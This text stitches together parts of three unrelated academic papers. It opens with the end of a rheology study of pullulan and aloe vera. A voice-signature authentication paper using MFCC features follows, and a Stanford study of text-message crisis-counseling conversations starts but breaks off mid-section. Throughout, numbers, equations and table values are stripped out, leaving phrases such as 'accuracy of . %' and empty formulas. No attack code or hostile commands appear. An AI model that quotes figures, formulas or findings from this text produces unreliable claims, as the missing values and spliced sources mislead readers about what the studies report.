experiments. the mixture of pullulan and aloe vera is stable under temperature oc as shown in figure . however viscous modulus is higher than elastic modulus of the mixture. figure . storage and loss modulus vs. time iv. conclusion the objective of this research is to study the flow behavior of the mixture of pullulan and aloe vera. different samples of the mixture have been carried out. it is concluded that the mixture of % pullulan-aloe vera can be pumped with a minor effects on the flow behavior. the rheological properties of nanofiber at , times magnification using phd syringe pump at kv with a distance cm were carried out. the yield stress is small since it is a key parameter in production, the mixture requires small force to flow. the viscosity decreases with increasing the shear rate. the cross model gives a good agreement with measured data at cross time constant s. however, elastic modulus doesn’t change with increasing the frequency. in the future, more rheological tests will be studied to indicate better predications of the fluids behavior. international journal of advanced network, monitoring and controls volume , no. , references [ ] thorat, k. a review of the stability of aloe vera gel. research j topic and cosmetic sci. [ ] torres- giner, s. nanoencapsulation of aloe vera in synthetic and naturally occurring polymers by electrohydrodynamic processing of interest in food technology and bioactive packaging [ ] aloe vera incorporated bioimetic nanofibrous scaffold: a regenerative approach for skin tissue engineering, suganya, s. [ ] tarameshloo, m., nourouzian, m., zarein-dolab, s. aloe vera gel and thyroid hormone cream may improve wound healing in wistar rats [ ] pellicconi, m., molinari, g.p. lucini, l. stability of the main aloe fractions and aloe-based commercial products under different storage conditions. agrochimica, vol. lv-n , september . [ ] kuan-chen cheng, ali demirci, jeffrey m. catchmark, “pullulan: biosynthesis, production, and applications, applied microbiology and biotechnology, july . [ ] ram s.singhagaganpreet k.sainiajohn f.kennedy, “pullulan: microbial sources, production and applications”, carbohydrate polymers, volume , issue , september , pages - . [ ] shady, s, gaines, p. garhwal, r. leahy, c. ellis, e. et al. synthesis and characterization of pullulan-polycaprolactone core–shell nanospheres encapsulated with ciprofloxacin. j of biomed nanotech vol. , – , . [ ] j.k. park, t. khan other microbial polysaccharides: pullulan, scleroglucan, elsinan, levan, alternant, dextran., in handbook of hydrocolloids (second edition), . [ ] a bossart, s. shady, and d. kalyon, “electrospun pullulan based nanofibers for medical applications”, nd society for - abstracts.biomaterials.org [ ] burger,christian, et al. “nanofibrous materials and their applications”, doi: . /annurev.matsci. . . . [ ] dias, j r, et al. “advances in electrospun skin substitutes.” doi: . /j.pmatsci. . . . [ ] coats b.c. method of processing stabilized aloe vera gel obtained from the whole aloe vera leaf. , , . u.s. patent. oct . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , a secure voice signature based lightweight authentication approach for remote access control oladayo olufemi olakanmi electrical and electronic engineering university of ibadan ibadan, nigeria e-mail: olakanmi.oladayo@ui.edu.ng aminat shodipo embedded systems and security research group university of ibadan ibadan, nigeria e-mail: olakanmi.oladayo@ui.edu.ng abstract—crypto-authentication schemes become unreliable whenever the private key is compromised, making them unfit for any system or network that requires high level of confidentiality. key compromise is inevitable due to the wider space of operability of key in most of the cryptography based authentication schemes. to improve the performance of any authentication system, there is need to narrow its key operability to the key owner, that is eliminating the influence of other parties in the key generation and operability. however, this is quite difficult especially for any network that is characterised with low computation and energy, and relied on the third party for key management. in this paper, we propose the adoption of mel-frequency cepstral coefficients (mfcc) based voice signature based authentication scheme with a taint of cryptography operation. the scheme extracts the user’s voice signature as the hash of the mfcc parameters of the voice and unique passcode which is used for the authentication. we used exclusive or to filter off remnant of noise from mfcc values without incurring extra hardware cost. the performance evaluation results show authentication accuracy of . % at low computation cost and communication overhead. keywords-mfcc, authentication, cryptosystem, coding, security, access control i. introduction the adoption of cryptography in security system has not only enhanced the integrity of data and confidentiality but obviously contribute to the acceptability of most of the new technologies. however, cryptography based security schemes may not proffer universal security solution to most systems or networks. this is due to the restrictive processing power and memory resources, wider key generation procedure and operability that characterised these class of cryptograph based security solutions. therefore, they may not be effective for some systems. besides, key distribution is another issue in cryptography based security solutions, although public-key infrastructure can be used to eliminate problems involved with key distribution, however it comes with a lot of overheads. therefore, it is very important to find ways to reduce the overheads yet not sacrificing other aspects of security. the major loophole of cryptography security solutions is key escrow. this is a cryptographic key exchange process in which a key is held in escrow, or stored, by a third party. the problem with this, is that a lost key or compromised by its original user(s) may be used to decrypt encrypted material. key escrow is proactive through key disclosure laws. that is, it anticipates the need for access to keys. however, it also introduces new risks like loss of keys and legal issues such as involuntary self-incrimination which are likened to security weakness. recently, attention has been shifted to the adoption of biometric solution to mitigate some of the security loopholes of cryptography solution. biometric based technique may limit key generation and operability only to the users. however, some biometric based techniques have shortcomings which hinder their adoptability in access control. for example, replication is one of the major vulnerabilities of finger print based authentication systems. a few methods for fingerprint replication such as the use of grease stains on the scanner and/or latent fingerprint, the use of live finger, which is forceful amputated from the owner. mfcc is one of the popular algorithms for extracting features of speech in voice recognition. it is common to normalise their values when adopted in speech recognition systems. efforts had been made to improve on its algorithm such as raising the log-mel- amplitudes to a suitable power before taking the dct so as to nullify the effect of additive noise [ ]. in this paper we used exclusive or (xor) to nullify the remnant additive noise in mfcc values and generates unique voice signature of the user in the authentication phase. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ii. related work voice recognition system has become a sophisticate security tool and a technology with great potential in authentication systems. it is the only biometric based recognition system that processes acoustic information contrary to other forms of biometrics, such as fingerprint, dna, retina etc., that are image-based. each human has their unique characteristic in speech and voice that can be captured and analyzed. voice recognition system can be divided into two phases; identification and verification phases. voice identification is used to decide who an unknown voice belongs to amongst a set of known speakers while voice verification accepts or rejects the identity claim of a speaker. voice identification can also be sub-classified into text-dependent and text-independent identification. in text-dependent identification, the individual has to utter the same keyword both in the test and training phases. meanwhile, text-independent identification properly identifies the speaker regardless of what is being said. voice recognition system has a lot of applications, such as authentication in remote identification and verification, mobile banking, atm transactions, and online transactions and reservations; information security in device logon, and application and database security; law enforcement such as forensic investigation, and surveillance applications. several works had been done on voice recognition and its application to solve different access control problems. for example, sidiqs et al. [ ], proposed a speech recognition system to translate human speech to an action in machine. they used mfcc by splitting the input signal amplitudes into frames which are processed using the mel-filterbak. the results are made into a codebook which is used as an input symbol to form a model of every word. jagan and rameshin [ ] also developed a mfcc and dynamic time wrapping (dtw) based speech recognition system for feature extraction and pattern matching respectively. drisya and anish [ ] used bessel features as an alternative to mfcc and lpcc to develop a text-independent speaker identification system. the quasi-stationary nature of speech signal was represented by damped sinusoidal based function, and a bessel features derived from the speech signal was used to create gaussian mixture models for text independent speaker identification. meanwhile, work in [ ] introduced a new algorithm for extracting mfcc for speech recognition. the results showed that the new algorithm reduced the computation power and accuracy compared to the conventional algorithm. the ability to perform postural transitions such as sittostand is an accepted metric for functional independence. the number of transitions performed in real life situations provides useful clinical information for an individual recovering from lower extremity injury or surgery. consequent to this, sadra and eric [ ] proposed a new inertialsensor based approach to detect transitions using wavelet transform. their approach is robust for supervised laboratory and ambient settings. also, authors in [ ] developed a speaker recognition system using a statistical model like gaussian mixture model (gmm) to implement a recognizer. the features extracted from the speech signal were used to build a unique identity for each authorised user. estimation and maximization algorithms were used for finding the maximum likelihood solution for a model with latent variables. laryngeal diseases and vocal fold pathologies have strong impacts on the quality of the voice recognition system. in [ ] a user friendly approach was proposed to discriminate between normal and abnormal voice. the feature extraction technique was applied on the voice signal in the time domain and in the frequency domain. another work on voice recognition is speaker identification system proposed in [ ]. in the work, a speaker recognition system was implemented using a combination of mfcc and kekre’s median code book generation algorithm (kmcg). the mfcc algorithm was used for feature extraction while the kmcg algorithm plays important role in code book generation and feature matching. however, most of these works were directed to voice recognition systems. our work is directed to how the voice signature can be combined with cryptography operation to evolve an efficient access control scheme with narrow operability to mitigate key compromise. iii. voice signature based authentication scheme for access control the voice signature based authentication scheme involves two phases; registration and authentication phases. the registration phase takes voice samples and pass codes of all the authorised individuals, processed it in order to reduce the overall bulk and complexity, then extracts mfcc (mel-frequency cepstral coefficients) before generating the voice signature. this phase is sub-divided into six divisions; elimination of silent frame, framing, hamming windowing, mfcc generation, and voice signature generation. meanwhile, the verification phase regenerates the user’s voice signature and compare it with all the encrypted voice signature stored in the international journal of advanced network, monitoring and controls volume , no. , memory of the access point’s memory using the k- means algorithm and correlation coefficient. figure . model of the remote voice based access control a. registration phase in the registration phase, voice samples are collected from a number of authorised users by the remote system. these voice samples are then pre- processed and their voice signature are obtained, encrypted and stored in the memory of the access control unit of the remote system. this stage consists of six sub-stages which are described below. to generate the voice signature all the stages must be executed in that order. ) elimination of silent frames it is pertinent to remove silent frames when processing speech in order to reduce the overall bulk and complexity of the speech signal. it is known that when humans are talking, it is very impossible not to have gaps or pauses in between words and sentences hence the importance of this phase. these gaps and pauses in the middle of speech increase the speech length or the number of frames to be processed, it therefore important to remove them. after proper studying of the spectrogram of speech, the amplitude for silent frames was pegged at . hence frames with amplitude less than . are removed. ) framing framing sub-stage divides the continuous speech signal into frames of b samples, with adjacent frames being separated by a where . first frame consists of first b samples. then, second frame begins with a samples after the first frame, and overlaps it by samples and so on. this continues until all the speech is accounted within one or more frames. typically, b and a are chosen as and respectively. figure shows a speech signal after it has been framed. figure . speech signal after undergoing framing ) hamming windowing after framing, hamming windowing, as shown in figure , is now used to tape the voice signal to zero at the beginning and the end, thereby reducing discontinuities in the signal. this helps to focus on the information at the centre of the frame as shown in figure . for example, if the window is defined as and the speech signal as then the resultant signal after windowing is the signal defined as: . in this work, we used a hamming window of the form: ( ) figure . hamming window before applying it on speech signal figure . speech signal after applying the hamming window international journal of advanced network, monitoring and controls volume , no. , ) fast fourier transform(fft) fft is then used to transform the speech signal from time domain to frequency domain in order to easily obtain the mfcc. the fft is a fast algorithm to implement the discrete fourier transform (dft), which is defined on the set of n samples . gives the fast fourier transform of frame in general are complex numbers and we only consider their absolute values (magnitudes) because considering the phase produces very skewed results as shown in figure and . figure . audio signal with magnitude and phase figure . audio signal considering the magnitude only ) mel-frequency cepstral coefficient out of all the feature extraction algorithms that are available, mfcc is commonly used because of the way it closely mimics the natural human auditory system. the mel-frequency scale is a linear frequency spacing below hz and a logarithmic spacing above hz. the best approach to simulate the subjective spectrum is to use a filter bank, spaced uniformly on the spectral properties of the signal for the given frame analysis. the mel spectrum coefficients are converted back to time domain using the discrete cosine transform (dct ). the mfcc is calculated as: ; ≤ n ≤ k – ( ) the first component is excluded from the dct since it represents the mean value of the input signal and hence carries little speaker specific information [ ]. figure . mel-filter bank ) voice signature generation after obtaining the mfcc values, the access control unit then selects the maximum value and minimum value as the mfcc of the user, and calculate the user’s voice signature as the encryption of hash of the mfcc and passcode of the user. that is, voice signature is generated as: = ( ) the operator acts as a noise filter since the two mfcc values and includes the same additive noise and xor operator is mutually exclusive. ) authentication phase to access the system, the scheme requests for the user’s voice signal through the mobile device in order to re-generate an access voice signature. it then compares the re-generated access voice signature with all the voice signatures in the memory in order to authenticate the user. iv. performance evaluation a. experimental setup one hundred and fifty two tests using different users of mixed sex were used to test the efficiency of the voice based authentication scheme. voice signatures of the five users ( females and males) saying the same sentence were extracted. international journal of advanced network, monitoring and controls volume , no. , table i. performance evaluation of voice signature based authentication approach trial no. of samples no.of false rejection no. of false acceptance % accuracy user user user user user each person voice signature was matched with the rest of the voices signatures in the database. the accuracy of systems was determined in terms of false acceptances and false rejections. a false acceptance occurs when the system grants access to an unauthorised user while a false rejection occurs when the system denies the unauthorized user is granted access. the scheme was simulated on a simulation platform consisting of a mobile device (samsung galaxy s with a quad-core . ghz processor, gb ram, and google android . . operating system, a pc with intel(r) core(tm) i - u cpu @ . ghz processor as the remote access control system. we determine the computation and communication costs of the scheme. b. result and discussion the results of the performance of the scheme in terms of false acceptance and rejection ratios are shown in table . it shows that the system is accurate with accuracy of . %. also, computation cost, in terms of the execution time by the scheme for points fft, is obtained as shown in figure . this shows that the computation cost increases as the number of users increases, and indicates that the scheme has low computation cost and can be easily adopted by any system that is characterised as computation and energy constraint system. also, figure shows the energy consumption of the scheme in terms of number of cycles required. this also indicates that the proposed scheme is energy-aware since energy consumed by a processor is approximately proportional to number of cycles or frequency , and to the square of the processor voltage v [ ]. meanwhile, the communication overhead incurred for every authentication is bits. this indicates that the scheme requires low bandwidth and there will never be congestion irrespective of the bandwidth of the communication channel. figure . computation cost (ms) figure . energy cost in terms of cycles v. conclusion in this work, we demonstrated how voice signature can be used to developed access control scheme for remote system. we solved the effect of the additive noise on mfcc using to eliminate the congruent additive noise embedded in the maximum mfcc and minimum mfcc values. the mfcc, hash function and conventional pass-code are used generate voice signature from user’s voice signal. this is used to solve the problem of wider operability of key in cryptography based references [ ] muslim sidiq, tjokorda agung budi w, siti saadah ( ). design and implementation of voice command using mfcc and hmms method. rd international conference on information and communication technology ( icoict ). [ ] drisya vasudev, anish babu ( ). speaker identification using fbcc in malayalam language. international conference on advances in computing, communications and informatics (icacci). international journal of advanced network, monitoring and controls volume , no. , [ ] jagan mohan and ramesh babu( ). speech recognition using mfcc and dtw. st int. conference on advances in electrical engineering, vit, vellore, india [ ] wei han, cheong-fat chan, chiu-sing choy, kong-pang pun ( ). an efficient mfcc extraction method in speech recognition. iscas, proceedings of ieee international symposium on circuits and systems. [ ] sadra hemmati, eric wade ( ). detecting postural transitions: a robust wavelet-based approach. proceeding of ieee th annual international conference of the engineering in medicine and biology society (embc), pp. - . [ ] s. g. bagul, r.k.shastri ( ). text independent speaker recognition system using gmm. international conference on human computer interactions (ichci), pp - . [ ] manal abdel wahed ( ). computer aided recognition of pathological voice. st national radio science conference (nrsc), pp. – . [ ] h b kekre, v a bharadi, a r sawant, onkar kadam, pushkar lanke, rohit lodhiya ( ). speaker recognition using vector quantization by mfcc and kmcg clustering algorithm. international conference on communication, information and computing technology ( iccict ). [ ] tyagi and c. wellekens ( ). on desensitizing the mel-cepstrum to spurious spectral components for robust speech recognition. in proceeding of ieee international conference on acoustics, speech and signal processing, vol. , pp. - . [ ] saqui z., salam n., nair n., pandey n. ( ) voiceprint recognition system for remote authentication survey. international journal of hybrid information technology, vol. , no. . [ ] sunil a., shruti a., rama c. ( ) prosodic feature based text dependent speaker recognition using machine learning algorithms. international journal of engineering science and technology, vol. no. , pp. - . [ ] kirti a., and minakshee p., ( ). speech and speaker identification for password verification system. international journal of advanced research in electrical,electronic and instrumentation, vol. , issue . [ ] parrul, r., dubey, b., ( ). automatic speaker recognition system. international journal of advanced computer research, vol. , no. . [ ] wikipedia. ( ). cpu power dissipation. (http://en.wikipedia.org/wiki/cpu-power-dissipation) large-scale analysis of counseling conversations: an application of natural language processing to mental health tim althoff∗, kevin clark∗, jure leskovec stanford university {althoff, kevclark, jure}@cs.stanford.edu abstract mental illness is one of the most pressing pub- lic health issues of our time. while counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. in this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. we develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. introduction mental illness is a major global health issue. in the u.s. alone, . million adults ( . %) experience mental illness in a given year (national institute of mental health, ). in addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (insel, ). in many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (world health organization, ). however, it is far from obvious how to best conduct counsel- ing conversations. such conversations are free-form without strict rules, and involve many choices that *both authors contributed equally to the paper. could make a difference in someone’s life. thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., labov and fanshel, ( ); haberstroh et al., ( )). how- ever, recent advances in technology-mediated coun- seling conducted online or through texting (haber- stroh et al., ) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. here we present the largest study on counseling conversation strategies published to date. we use data from an sms texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. the data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. we develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). we focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. we find that there are sig- nificant, quantifiable differences between more suc- cessful and less successful counselors in how they conduct conversations. our findings suggest actionable strategies that are associated with successful counseling: . adaptability (section ): measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. . dealing with ambiguity (section ): we de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. we learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. . creativity (section . ): we quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. . making progress (section ): we develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. . change in perspective (section ): we de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. we find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. we further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (section ). such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. the dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. related work our work relates to two lines of research: therapeutic discourse analysis & psycholinguis- tics. the field of conversation analysis was born in the s out of a suicide prevention center (sacks and jefferson, ; van dijk, ). since then conversation analysis has been applied to various clinical settings including psychotherapy (labov and fanshel, ). work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (pennebaker et al., ). previous work also found that there are linguistic cues as- sociated with depression (ramirez-esparza et al., ; campbell and pennebaker, ) as well as with suicude (pestian et al., ). these find- ings are consistent with beck’s cognitive model of depression ( ; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with pyszczynski and greenberg’s self-focus model of depression ( ; depressed persons engage in higher levels of self-focus than non-depressed per- sons). in this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. large-scale computational linguistics applied to conversations. large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (niederhoffer and pennebaker, ; danescu-niculescu-mizil, ) as well as expressions of social power and status (bramsen et al., ; danescu-niculescu- mizil et al., ). other studies have connected writing to measures of success in the context of re- quests (althoff et al., ), user retention (althoff and leskovec, ), novels (ashok et al., ), and scientific abstracts (guerini et al., ). prior http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (stolcke et al., ). unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- ical clusters, or stages. most approaches employ hidden markov model-like models (barzilay and lee, ; ritter et al., ; paul, ; yang et al., ) which are also used in this work to model progression through conversation stages. very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. howes et al. ( ) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. counseling datasets have also been used to predict the conversa- tion outcome (huang, ) but without modeling the within-conversation dynamics that are studied in this work. other work has explored how novel inter- faces based on topic models can support counselors during conversations (dinakar et al., a; b; ; chen, ). our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. dataset description in this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via sms messages. text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. counseling process. any person in distress can text the organization’s public number. incoming re- quests are put into a queue and an available coun- dataset statistics conversations , conversations with survey response , ( . %) messages . million messages with survey response , ( . %) counselors messages per conversation* . words per message* . table : basic dataset statistics. rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. we refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. after the conversation ends, the texter receives a follow-up question (“how are you feeling now? better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). in contrast to previous work that has used human judges to rate a caller’s crisis state (kalafat et al., ), we di- rectly obtain this feedback from the texter. further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). all crisis counselors receive extensive training and commit to weekly shifts for a full year. dataset statistics. our dataset contains coun- selors and . million messages in , conversa- tions between november and november (see table ). all system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. out of these conversations, we use the , , or . %, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. conversations span a variety of issues of different difficulties (see rows one and two of ta- ble ). approval to analyze the dataset was obtained from the stanford irb. defining counseling quality the primary goal of this paper is to study strategies that lead to conversations with positive outcomes. thus, we require a ground-truth notion of conver- sation quality. in principle, we could study individ- na depressed relationship self harm family suicide stress anxiety other success rate . . . . . . . . . frequency . . . . . . . . . frequency with more successful counselors . . . . . . . . . frequency with less successful counselors . . . . . . . . . table : frequencies and success rates for the nine most common conversation issues (na: not available). on average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. however, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. there are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): first, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). while each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. second, we assume that conversation qual- ity is noisy. even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. over time, however, the “true” quality of the counselor will become appar- ent. third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. more vs. less successful counselors. we split the counselors into two groups and then compare their behavior. out of the counselors with more than labeled conversations of at least messages each, we use the most successful counselors as “more successful” counselors and the bottom as “less successful” counselors. their average success rates are . - . % and . - . %, respectively. while the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- - - - - - portion of conversation (% of messages) a ve ra ge m es sa ge le ng th more successful counselors, positive conversations more successful counselors, negative conversations less successful counselors, positive conversations less successful counselors, negative conversations figure : differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). error bars in all plots corre- spond to bootstrapped % confidence intervals using the member bootstrapping technique from ren et al. ( ). sations. studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. for example, figure illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. initial analysis. before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: do counselors specialize in certain issues? and, do successful counselors appear suc- cessful only because they handle “easier” cases? to gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). we com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. thus, we conclude that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. however, we find that this is not the case. in par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in . % vs. . %, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously ( . vs. . ). further, we find that both groups face sim- ilar distributions of issues over time (see table ). we attribute the largest difference, “na” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. counselor adaptability in the remainder of the paper we focus on factors that mediate the outcome of a conversation. first, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. we investigate this question by looking for language differences between positive and neg- ative conversations. in particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. we capture the time dimension by breaking up each conversation into five even chunks of messages. then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first %, second %, etc.), we build a tf-idf vector of word occurrences to represent the language of counselors within this subset. we use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. we then measure the difference between the “posi- - - - - - ortlon of conversdtlon (% of pessdges) . . . . . . . . d ls td nc e be tw ee n po sl tlv e d nd n eg dt lv e co nv er sd tlo ns ore successful counselors less successful counselors figure : more successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. all differences between more successful and less successful counselors except for the - bucket were found to be statistically significant (p < . ; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. we also explored using jensen-shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. results. we find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (figure ). at the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. this increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. reacting to ambiguity observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the dif- ferences. in particular, domain experts have sug- gested that more successful counselors are better at handling ambiguity in the conversation (levitt and jacques, ). here, we use ambiguity to refer to the uncertainty of the situation and the texter’s ac- tual core issue resulting from insufficiently short or uncertain descriptions. does initial ambiguity of the situation negatively affect the conversation? how do more successful counselors deal with ambiguous sit- uations? [ , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . f ra ct io n o f p o si tiv e c o n v. more successful less successful figure : more ambiguous situations (length of situation setter) are less likely to result in positive conversations. ( , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . . |r e sp o n se | / |s itu a tio n s e tt e r| counselor quality more successful less successful figure : all counselors react to short, ambiguous mes- sages by writing more (relative to the texter message) but more successful counselors do it more than less success- ful counselors. ambiguity. throughout this section we measure ambiguity in the conversation as the shortness of the texter’s responses in number of words. while ambi- guity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from brysbaert et al. ( )), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish. . initial ambiguity and situation setter it is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the con- versation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). however, we can study nearly identi- cal beginnings of conversations where we can di- rectly compare how more successful and less suc- cessful counselors react given nearly identical situa- tions (the texter first sharing their reason for texting in). we identify the situation setter within each con- versation as the first long message by the texter (typ- ically a response to a “can you tell me more about what is going on?” question by the counselor). results. we find that ambiguity plays an important role in counseling conversations. figure shows that more ambiguous situations (shorter length of situation setter) are less likely to result in success- ful conversations (we obtain similar results when measuring concreteness (brysbaert et al., ) di- rectly). further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (figure ; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = ). how- ever, more successful counselors react more strongly to ambiguous situations than less successful coun- selors. . how to respond to ambiguity having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. we match situation setters by representing them through tf-idf vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space. we only con- sider situation setters that are part of a dense cluster with at least neighbors, allowing us to compare follow-up responses by the counselors ( / situation setters were part of one of such clus- ters). we also used distributed word embeddings (e.g., (mikolov et al., )) instead of tf-idf vec- tors but found the latter to produce better clusters. based on counselor training materials we hypoth- esize that more successful counselors • address ambiguity by writing more themselves, • use more check questions (statements that tell the conversation partner that you understand threshold manually set after qualitative analysis of matches from randomly chosen clusters. results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., euclidean). more s. less s. test % conversations successful . . *** #messages in conversation . . *** situation setter length (#tokens) . . *** c response length (#tokens) . . *** t response length (#tokens) . . *** % cosine sim. c resp. to context . . *** % cosine sim. t resp. to context . . – % c resp. w check question . . *** % c resp. w suicide check . . *** % c resp. w thanks . . *** % c resp. w hedges . . *** % c resp. w surprise . . – table : differences between more and less success- ful counselors (c; more s. and less s.) in responses to nearly identical situation setters (sec. . ) by the texter (t). last column contains significance levels of wilcoxon signed rank tests (*** p < . , – p > . ). them while avoiding the introduction of any opinion or advice (labov and fanshel, ); e.g.“that sounds like...”), • check for suicidal thoughts early (e.g., “want to die”), • thank the texter for showing the courage to talk to them (e.g., “appreciate”), • use more hedges (mitigating words used to lessen the impact of an utterance; e.g., “maybe”, “fairly”), • and that they are less likely to respond with sur- prise (e.g., “oh, this sounds really awful”). a set of regular expressions is used to detect each class of responses (similar to the examples above). results. we find several statistically significant dif- ferences in how counselors respond to nearly iden- tical situation setters (see table ). while situation setters tend to be slightly longer for more success- ful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in tf- idf space) compared to less successful counselors (but the texter’s response does not seem affected). we do find that more successful counselors use more check questions, check for suicide ideation more of- 